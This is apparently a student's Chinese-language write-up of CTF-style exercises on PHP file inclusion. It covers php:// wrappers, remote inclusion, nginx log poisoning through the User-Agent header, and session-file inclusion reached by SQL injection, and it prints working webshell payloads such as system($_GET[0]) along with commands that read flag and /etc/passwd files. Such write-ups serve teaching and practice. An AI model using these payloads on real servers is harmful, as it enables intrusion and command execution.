班级作业笔记报告0x03

作业1:

文件包含漏洞php://伪协议

经典代码

看了下phpinfo信息

allow_url_fopen=On && allow_url_include=On

允许无文件落地getshell

使用php://伪协议的input方法,需要POST请求,但是file参数接收仍需GET传参

POST传参请求体直接窃取flag

<?=system('cat /f*');

作业2:

伪协议

点击连接抓包

?file=show.php

屏幕出现三个tips。。。

传参?file=/etc/passwd,正常回显,而flag会被拦截

使用php://filter不会被拦截,base64读取tips.php文件

?file=php://filter/convert.base64-encode/resource=tips.php

解码后内容源码分析,直接eval输出

最终

echo`cat /*`;

echo`cat /f*`;

作业3:

远程文件包含

echo '<?php phpinfo();system($_GET[0]);?>'>1.txt

python3 -m http.server 6666

查找flag

获取flag

作业4:

日志文件包含

访问网站,获取Cookie值

对Cookie值进行base64解密,发现疑似被反序列化,根据题意,将路径改成中间件日志文件:/var/log/nginx/access.log

发现可以User-agent写入

构造webshell

User-agent: <?php system($_GET[0]);?>

尝试getshell,传参?0=ls /,发现flag,名为flag_sHkqD

获取flag,传参?0=cat /fla*

作业5:

session文件包含

访问首页,访问了后台登录发现需要密码,测试了下登录框没有SQL注入漏洞,首页的点击了数字,抓包发现有个id参数,尝试sql注入,发现存在SQL注入,数字型

获取数据库名

获取表名

获取字段名

获取账户密码,得到了admin/wuhaijiayou

登录后台,发现功能点有个查看文件功能

包含自己的session文件,默认路径为/var/lib/php5/sess_PHPSESSID的值,可以看见响应头的最后有个斜杠/,尝试getshell

写入webshell,记得URL编码

<?php system($_GET[0]);?>

传参?0=ls /

这道题似乎没放flag

个人评价:

这几道题都是很经典的文件包含落地题,文件包含严重可getshell,还可以无文件落地getshell,红队的最爱之一

相关推荐
中草药z24 分钟前
【测试基础】Python 核心语法,一篇搞定测试脚本开发基础
开发语言·笔记·python·学习·测试·语法
一口吃俩胖子1 小时前
【脉宽调制DCDC功率变换学习笔记020】频域性能准则
笔记·学习
被考核重击2 小时前
WASM学习笔记
笔记·学习·wasm
三品吉他手会点灯2 小时前
C语言学习笔记 - 27.C编程预备计算机专业知识 - 什么是字节
c语言·开发语言·笔记·学习
中屹指纹浏览器2 小时前
指纹浏览器硬件仿真技术解析:显卡、音频、外设指纹伪装原理
经验分享·笔记
李少兄3 小时前
编程中的 e 表示法:科学计数法在代码里的指南
笔记·科学计数法·e
ouliten4 小时前
[Triton笔记3]融合 Softmax (Fused Softmax)
笔记·triton
岑梓铭5 小时前
考研408《操作系统》复习笔记,第二章《2.3.3 + 2.3.4 经典同步问题、管程》
笔记·考研·操作系统·408·os
前端小马5 小时前
PTE考试笔记
笔记·英语
m0_46644103詹湛6 小时前
FPGA时序优化与高速接口实战手册
笔记·学习·fpga开发·硬件架构·verilog